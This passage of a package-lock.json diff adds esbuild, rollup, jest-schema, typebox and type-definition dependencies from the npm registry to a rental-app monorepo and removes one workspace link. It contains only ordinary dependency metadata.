"sha512-1SDgH6ZSPTlggy1yI6+Dbkiz8xzpHJEVAlF/AM1tHPLsf5STom9rwtjE4hKAF20FfXXNTFqEYXyJNWh1GiZedQ==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "aix" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/android-arm": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.21.5.tgz", + "integrity": "sha512-vCPvzSjpPHEi1siZdlvAlsPxXl7WbOVUBBAowWug4rJHb68Ox8KualB+1ocNvT5fjv6wpkX6o/iEpbDrf68zcg==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/android-arm64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.21.5.tgz", + "integrity": "sha512-c0uX9VAUBQ7dTDCjq+wdyGLowMdtR/GoC2U5IYk/7D1H1JYC0qseD7+11iMP2mRLN9RcCMRcjC4YMclCzGwS/A==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/android-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.21.5.tgz", + "integrity": "sha512-D7aPRUUNHRBwHxzxRvp856rjUHRFW1SdQATKXH2hqA0kAZb1hKmi02OpYRacl0TxIGz/ZmXWlbZgjwWYaCakTA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/darwin-arm64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.21.5.tgz", + "integrity": "sha512-DwqXqZyuk5AiWWf3UfLiRDJ5EDd49zg6O9wclZ7kUMv2WRFr4HKjXp/5t8JZ11QbQfUS6/cRCKGwYhtNAY88kQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/darwin-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.21.5.tgz", + "integrity": "sha512-se/JjF8NlmKVG4kNIuyWMV/22ZaerB+qaSi5MdrXtd6R08kvs2qCN4C09miupktDitvh8jRFflwGFBQcxZRjbw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/freebsd-arm64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.21.5.tgz", + "integrity": "sha512-5JcRxxRDUJLX8JXp/wcBCy3pENnCgBR9bN6JsY4OmhfUtIHe3ZW0mawA7+RDAcMLrMIZaf03NlQiX9DGyB8h4g==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/freebsd-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.21.5.tgz", + "integrity": "sha512-J95kNBj1zkbMXtHVH29bBriQygMXqoVQOQYA+ISs0/2l3T9/kj42ow2mpqerRBxDJnmkUDCaQT/dfNXWX/ZZCQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-arm": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.21.5.tgz", + "integrity": "sha512-bPb5AHZtbeNGjCKVZ9UGqGwo8EUu4cLq68E95A53KlxAPRmUyYv2D6F0uUI65XisGOL1hBP5mTronbgo+0bFcA==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-arm64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.21.5.tgz", + "integrity": "sha512-ibKvmyYzKsBeX8d8I7MH/TMfWDXBF3db4qM6sy+7re0YXya+K1cem3on9XgdT2EQGMu4hQyZhan7TeQ8XkGp4Q==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-ia32": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.21.5.tgz", + "integrity": "sha512-YvjXDqLRqPDl2dvRODYmmhz4rPeVKYvppfGYKSNGdyZkA01046pLWyRKKI3ax8fbJoK5QbxblURkwK/MWY18Tg==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-loong64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.21.5.tgz", + "integrity": "sha512-uHf1BmMG8qEvzdrzAqg2SIG/02+4/DHB6a9Kbya0XDvwDEKCoC8ZRWI5JJvNdUjtciBGFQ5PuBlpEOXQj+JQSg==", + "cpu": [ + "loong64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-mips64el": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.21.5.tgz", + "integrity": "sha512-IajOmO+KJK23bj52dFSNCMsz1QP1DqM6cwLUv3W1QwyxkyIWecfafnI555fvSGqEKwjMXVLokcV5ygHW5b3Jbg==", + "cpu": [ + "mips64el" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-ppc64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.21.5.tgz", + "integrity": "sha512-1hHV/Z4OEfMwpLO8rp7CvlhBDnjsC3CttJXIhBi+5Aj5r+MBvy4egg7wCbe//hSsT+RvDAG7s81tAvpL2XAE4w==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-riscv64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.21.5.tgz", + "integrity": "sha512-2HdXDMd9GMgTGrPWnJzP2ALSokE/0O5HhTUvWIbD3YdjME8JwvSCnNGBnTThKGEB91OZhzrJ4qIIxk/SBmyDDA==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-s390x": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.21.5.tgz", + "integrity": "sha512-zus5sxzqBJD3eXxwvjN1yQkRepANgxE9lgOW2qLnmr8ikMTphkjgXu1HR01K4FJg8h1kEEDAqDcZQtbrRnB41A==", + "cpu": [ + "s390x" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/linux-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.21.5.tgz", + "integrity": "sha512-1rYdTpyv03iycF1+BhzrzQJCdOuAOtaqHTWJZCWvijKD2N5Xu0TtVC8/+1faWqcP9iBCWOmjmhoH94dH82BxPQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/netbsd-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.21.5.tgz", + "integrity": "sha512-Woi2MXzXjMULccIwMnLciyZH4nCIMpWQAs049KEeMvOcNADVxo0UBIQPfSmxB3CWKedngg7sWZdLvLczpe0tLg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/openbsd-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.21.5.tgz", + "integrity": "sha512-HLNNw99xsvx12lFBUwoT8EVCsSvRNDVxNpjZ7bPn947b8gJPzeHWyNVhFsaerc0n3TsbOINvRP2byTZ5LKezow==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/sunos-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.21.5.tgz", + "integrity": "sha512-6+gjmFpfy0BHU5Tpptkuh8+uw3mnrvgs+dSPQXQOv3ekbordwnzTVEb4qnIvQcYXq6gzkyTnoZ9dZG+D4garKg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "sunos" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/win32-arm64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.21.5.tgz", + "integrity": "sha512-Z0gOTd75VvXqyq7nsl93zwahcTROgqvuAcYDUr+vOv8uHhNSKROyU961kgtCD1e95IqPKSQKH7tBTslnS3tA8A==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/win32-ia32": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.21.5.tgz", + "integrity": "sha512-SWXFF1CL2RVNMaVs+BBClwtfZSvDgtL//G/smwAc5oVK/UPu2Gu9tIaRgFmYFFKrmg3SyAjSrElf0TiJ1v8fYA==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/win32-x64": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.21.5.tgz", + "integrity": "sha512-tQd/1efJuzPC6rCFwEvLtci/xNFcTZknmXs98FYDfGE4wP9ClFV98nyKrzJKVPMhdDnjzLhdUyMX4PsQAPjwIw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=12" + } + }, "node_modules/@eslint-community/eslint-utils": { "version": "4.9.1", "resolved": "https://registry.npmjs.org/@eslint-community/eslint-utils/-/eslint-utils-4.9.1.tgz", @@ -1116,6 +1511,19 @@ "url": "https://github.com/chalk/wrap-ansi?sponsor=1" } }, + "node_modules/@jest/schemas": { + "version": "29.6.3", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", + "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@sinclair/typebox": "^0.27.8" + }, + "engines": { + "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + } + }, "node_modules/@jridgewell/gen-mapping": { "version": "0.3.13", "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.13.tgz", @@ -1450,6 +1858,16 @@ "@otplib/plugin-thirty-two": "^12.0.1" } }, + "node_modules/@paralleldrive/cuid2": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/@paralleldrive/cuid2/-/cuid2-2.3.1.tgz", + "integrity": "sha512-XO7cAxhnTZl0Yggq6jOgjiOHhbgcO4NqFqwSmQpjK3b6TEE6Uj/jfSk6wzYyemh3+I0sHirKSetjQwn5cZktFw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@noble/hashes": "^1.1.5" + } + }, "node_modules/@pkgjs/parseargs": { "version": "0.11.0", "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", @@ -1881,14 +2299,399 @@ "resolved": "apps/marketplace", "link": true }, - "node_modules/@rentaldrivego/public-site": { - "resolved": "apps/public-site", - "link": true - }, "node_modules/@rentaldrivego/types": { "resolved": "packages/types", "link": true }, + "node_modules/@rollup/rollup-android-arm-eabi": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-android-arm-eabi/-/rollup-android-arm-eabi-4.60.4.tgz", + "integrity": "sha512-F5QXMSiFebS9hKZj02XhWLLnRpJ3B3AROP0tWbFBSj+6kCbg5m9j5JoHKd4mmSVy5mS/IMQloYgYxCuJC0fxEQ==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ] + }, + "node_modules/@rollup/rollup-android-arm64": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-android-arm64/-/rollup-android-arm64-4.60.4.tgz", + "integrity": "sha512-GxxTKApUpzRhof7poWvCJHRF51C67u1R7D6DiluBE8wKU1u5GWE8t+v81JvJYtbawoBFX1hLv5Ei4eVjkWokaw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ] + }, + "node_modules/@rollup/rollup-darwin-arm64": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-darwin-arm64/-/rollup-darwin-arm64-4.60.4.tgz", + "integrity": "sha512-tua0TaJxMOB1R0V0RS1jFZ/RpURFDJIOR2A6jWwQeawuFyS4gBW+rntLRaQd0EQ4bd6Vp44Z2rXW+YYDBsj6IA==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ] + }, + "node_modules/@rollup/rollup-darwin-x64": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-darwin-x64/-/rollup-darwin-x64-4.60.4.tgz", + "integrity": "sha512-CSKq7MsP+5PFIcydhAiR1K0UhEI1A2jWXVKHPCBZ151yOutENwvnPocgVHkivu2kviURtCEB6zUQw0vs8RrhMg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ] + }, + "node_modules/@rollup/rollup-freebsd-arm64": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-freebsd-arm64/-/rollup-freebsd-arm64-4.60.4.tgz", + "integrity": "sha512-+O8OkVdyvXMtJEciu2wS/pzm1IxntEEQx3z5TAVy4l32G0etZn+RsA48ARRrFm6Ri8fvqPQfgrvNxSjKAbnd3g==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ] + }, + "node_modules/@rollup/rollup-freebsd-x64": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-freebsd-x64/-/rollup-freebsd-x64-4.60.4.tgz", + "integrity": "sha512-Iw3oMskH3AfNuhU0MSN7vNbdi4me/NiYo2azqPz/Le16zHSa+3RRmliCMWWQmh4lcndccU40xcJuTYJZxNo/lw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ] + }, + "node_modules/@rollup/rollup-linux-arm-gnueabihf": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm-gnueabihf/-/rollup-linux-arm-gnueabihf-4.60.4.tgz", + "integrity": "sha512-EIPRXTVQpHyF8WOo219AD2yEltPehLTcTMz2fn6JsatLYSzQf00hj3rulF+yauOlF9/FtM2WpkT/hJh/KJFGhA==", + "cpu": [ + "arm" + ], + "dev": true, + "libc": [ + "glibc" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-arm-musleabihf": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm-musleabihf/-/rollup-linux-arm-musleabihf-4.60.4.tgz", + "integrity": "sha512-J3Yh9PzzF1Ovah2At+lHiGQdsYgArxBbXv/zHfSyaiFQEqvNv7DcW98pCrmdjCZBrqBiKrKKe2V+aaSGWuBe/w==", + "cpu": [ + "arm" + ], + "dev": true, + "libc": [ + "musl" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-arm64-gnu": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm64-gnu/-/rollup-linux-arm64-gnu-4.60.4.tgz", + "integrity": "sha512-BFDEZMYfUvLn37ONE1yMBojPxnMlTFsdyNoqncT0qFq1mAfllL+ATMMJd8TeuVMiX84s1KbcxcZbXInmcO2mRg==", + "cpu": [ + "arm64" + ], + "dev": true, + "libc": [ + "glibc" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-arm64-musl": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm64-musl/-/rollup-linux-arm64-musl-4.60.4.tgz", + "integrity": "sha512-pc9EYOSlOgdQ2uPl1o9PF6/kLSgaUosia7gOuS8mB69IxJvlclko1MECXysjs5ryez1/5zjYqx3+xYU0TU6R1A==", + "cpu": [ + "arm64" + ], + "dev": true, + "libc": [ + "musl" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-loong64-gnu": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-loong64-gnu/-/rollup-linux-loong64-gnu-4.60.4.tgz", + "integrity": "sha512-NxnomyxYerDh5n4iLrNa+sH+Z+U4BMEE46V2PgQ/hoB909i8gV1M5wPojWg9fk1jWpO3IQnOs20K4wyZuFLEFQ==", + "cpu": [ + "loong64" + ], + "dev": true, + "libc": [ + "glibc" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-loong64-musl": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-loong64-musl/-/rollup-linux-loong64-musl-4.60.4.tgz", + "integrity": "sha512-nbJnQ8a3z1mtmrwImCYhc6BGpThAyYVRQxw9uKSKG4wR6aAYno9sVjJ0zaZcW9BPJX1GbrDPf+SvdWjgTuDmnw==", + "cpu": [ + "loong64" + ], + "dev": true, + "libc": [ + "musl" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-ppc64-gnu": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-ppc64-gnu/-/rollup-linux-ppc64-gnu-4.60.4.tgz", + "integrity": "sha512-2EU6acNrQLd8tYvo/LXW535wupT3m6fo7HKo6lr7ktQoItxTyOL1ZCR/GfGCuXl2vR+zmfI6eRXkSemafv+iVg==", + "cpu": [ + "ppc64" + ], + "dev": true, + "libc": [ + "glibc" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-ppc64-musl": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-ppc64-musl/-/rollup-linux-ppc64-musl-4.60.4.tgz", + "integrity": "sha512-WeBtoMuaMxiiIrO2IYP3xs6GMWkJP2C0EoT8beTLkUPmzV1i/UcOSVw1d5r9KBODtHKilG5yFxsGRnBbK3wJ4A==", + "cpu": [ + "ppc64" + ], + "dev": true, + "libc": [ + "musl" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-riscv64-gnu": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-riscv64-gnu/-/rollup-linux-riscv64-gnu-4.60.4.tgz", + "integrity": "sha512-FJHFfqpKUI3A10WrWKiFbBZ7yVbGT4q4B5o1qKFFojqpaYoh9LrQgqWCmmcxQzVSXYtyB5bzkXrYzlHTs21MYA==", + "cpu": [ + "riscv64" + ], + "dev": true, + "libc": [ + "glibc" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-riscv64-musl": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-riscv64-musl/-/rollup-linux-riscv64-musl-4.60.4.tgz", + "integrity": "sha512-mcEl6CUT5IAUmQf1m9FYSmVqCJlpQ8r8eyftFUHG8i9OhY7BkBXSUdnLH5DOf0wCOjcP9v/QO93zpmF1SptCCw==", + "cpu": [ + "riscv64" + ], + "dev": true, + "libc": [ + "musl" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-s390x-gnu": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-s390x-gnu/-/rollup-linux-s390x-gnu-4.60.4.tgz", + "integrity": "sha512-ynt3JxVd2w2buzoKDWIyiV1pJW93xlQic1THVLXilz429oijRpSHivZAgp65KBu+cMcgf1eVVjdnTLvPxgCuoQ==", + "cpu": [ + "s390x" + ], + "dev": true, + "libc": [ + "glibc" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-x64-gnu": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-x64-gnu/-/rollup-linux-x64-gnu-4.60.4.tgz", + "integrity": "sha512-Boiz5+MsaROEWDf+GGEwF8VMHGhlUoQMtIPjOgA5fv4osupqTVnJteQNKJwUcnUog2G55jYXH7KZFFiJe0TEzQ==", + "cpu": [ + "x64" + ], + "dev": true, + "libc": [ + "glibc" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-x64-musl": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-x64-musl/-/rollup-linux-x64-musl-4.60.4.tgz", + "integrity": "sha512-+qfSY27qIrFfI/Hom04KYFw3GKZSGU4lXus51wsb5EuySfFlWRwjkKWoE9emgRw/ukoT4Udsj4W/+xxG8VbPKg==", + "cpu": [ + "x64" + ], + "dev": true, + "libc": [ + "musl" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-openbsd-x64": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-openbsd-x64/-/rollup-openbsd-x64-4.60.4.tgz", + "integrity": "sha512-VpTfOPHgVXEBeeR8hZ2O0F3aSso+JDWqTWmTmzcQKted54IAdUVbxE+j/MVxUsKa8L20HJhv3vUezVPoquqWjA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ] + }, + "node_modules/@rollup/rollup-openharmony-arm64": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-openharmony-arm64/-/rollup-openharmony-arm64-4.60.4.tgz", + "integrity": "sha512-IPOsh5aRYuLv/nkU51X10Bf75Bsf6+gZdx1X+QP5QM6lIJFHHqbHLG0uJn/hWthzo13UAc2umiUorqZy3axoZg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openharmony" + ] + }, + "node_modules/@rollup/rollup-win32-arm64-msvc": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-arm64-msvc/-/rollup-win32-arm64-msvc-4.60.4.tgz", + "integrity": "sha512-4QzE9E81OohJ/HKzHhsqU+zcYYojVOXlFMs1DdyMT6qXl/niOH7AVElmmEdUNHHS/oRkc++d5k6Vy85zFs0DEw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@rollup/rollup-win32-ia32-msvc": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-ia32-msvc/-/rollup-win32-ia32-msvc-4.60.4.tgz", + "integrity": "sha512-zTPgT1YuHHcd+Tmx7h8aml0FWFVelV5N54oHow9SLj+GfoDy/huQ+UV396N/C7KpMDMiPspRktzM1/0r1usYEA==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@rollup/rollup-win32-x64-gnu": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-x64-gnu/-/rollup-win32-x64-gnu-4.60.4.tgz", + "integrity": "sha512-DRS4G7mi9lJxqEDezIkKCaUIKCrLUUDCUaCsTPCi/rtqaC6D/jjwslMQyiDU50Ka0JKpeXeRBFBAXwArY52vBw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@rollup/rollup-win32-x64-msvc": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-x64-msvc/-/rollup-win32-x64-msvc-4.60.4.tgz", + "integrity": "sha512-QVTUovf40zgTqlFVrKA1uXMVvU2QWEFWfAH8Wdc48IxLvrJMQVMBRjuQyUpzZCDkakImib9eVazbWlC6ksWtJw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, "node_modules/@selderee/plugin-htmlparser2": { "version": "0.11.0", "resolved": "https://registry.npmjs.org/@selderee/plugin-htmlparser2/-/plugin-htmlparser2-0.11.0.tgz", @@ -1902,6 +2705,13 @@ "url": "https://ko-fi.com/killymxi" } }, + "node_modules/@sinclair/typebox": { + "version": "0.27.10", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.10.tgz", + "integrity": "sha512-MTBk/3jGLNB2tVxv6uLlFh1iu64iYOQ2PbdOSK3NW8JZsmlaOh2q6sdtKowBhfw8QFLmYNzTW4/oK4uATIi6ZA==", + "dev": true, + "license": "MIT" + }, "node_modules/@socket.io/component-emitter": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/@socket.io/component-emitter/-/component-emitter-3.1.2.tgz", @@ -2002,6 +2812,13 @@ "@types/node": "*" } }, + "node_modules/@types/cookiejar": { + "version": "2.1.5", + "resolved": "https://registry.npmjs.org/@types/cookiejar/-/cookiejar-2.1.5.tgz", + "integrity": "sha512-he+DHOWReW0nghN24E1WUqM0efK4kI9oTqDm6XmK8ZPe2djZ90BSNdGnIyCLzCPw7/pogPlGbzI2wHGGmi4O/Q==", + "dev": true, + "license": "MIT" + }, "node_modules/@types/cors": { "version": "2.8.19", "resolved": "https://registry.npmjs.org/@types/cors/-/cors-2.8.19.tgz", @@ -2074,6 +2891,13 @@ "integrity": "sha512-Ps3T8E8dZDam6fUyNiMkekK3XUsaUEik+idO9/YjPtfj2qruF8tFBXS7XhtE4iIXBLxhmLjP3SXpLhVf21I9Lw==", "license": "MIT" }, + "node_modules/@types/estree": { + "version": "1.0.9", + "resolved": "https://registry.npmjs.org/@types/estree/-/estree-1.0.9.tgz", + "integrity": "sha512-GhdPgy1el4/ImP05X05Uw4cw2/M93BCUmnEvWZNStlCzEKME4Fkk+YpoA5OiHNQmoS7Cafb8Xa3Pya8m1Qrzeg==", + "dev": true, + "license": "MIT" + }, "node_modules/@types/express": { "version": "4.17.25", "resolved": "https://registry.npmjs.org/@types/express/-/express-4.17.25.tgz", @@ -2124,6 +2948,13 @@ "license": "MIT", "optional": true }, + "node_modules/@types/methods": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/@types/methods/-/methods-1.1.4.tgz", + "integrity": "sha512-ymXWVrDiCxTBE3+RIrrP533E70eA+9qu7zdWoHuOmGujkYtzf4HQF96b8nwHLqhuf4ykX61IGRIB38CC6/sImQ==", + "dev": true, + "license": "MIT" + }, "node_modules/@types/mime": { "version": "1.3.5", "resolved": "https://registry.npmjs.org/@types/mime/-/mime-1.3.5.tgz", @@ -2295,6 +3126,47 @@ "dev": true, "license": "MIT" }, + "node_modules/@types/superagent": { + "version": "8.1.10", + "resolved": "https://registry.npmjs.org/@types/superagent/-/superagent-8.1.10.tgz", + "integrity": "sha512-nbt4IWXABhW0jGmmpRzCFNlbmwCTzZ2gTUsNIr+X+ItdqPms+PAJZbWsNzpS2USqXjcoNLQcO6nXo60zcPQiIg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/cookiejar": "^2.1.5", + "@types/methods": "^1.1.4", + "@types/node": "*", + "form-data": "^4.0.0" + } + }, + "node_modules/@types/superagent/node_modules/form-data": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.5.tgz", + "integrity": "sha512-8RipRLol37bNs2bhoV67fiTEvdTrbMUYcFTiy3+wuuOnUog2QBHCZWXDRijWQfAkhBj2Uf5UnVaiWwA5vdd82w==", + "dev": true, + "license": "MIT", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": 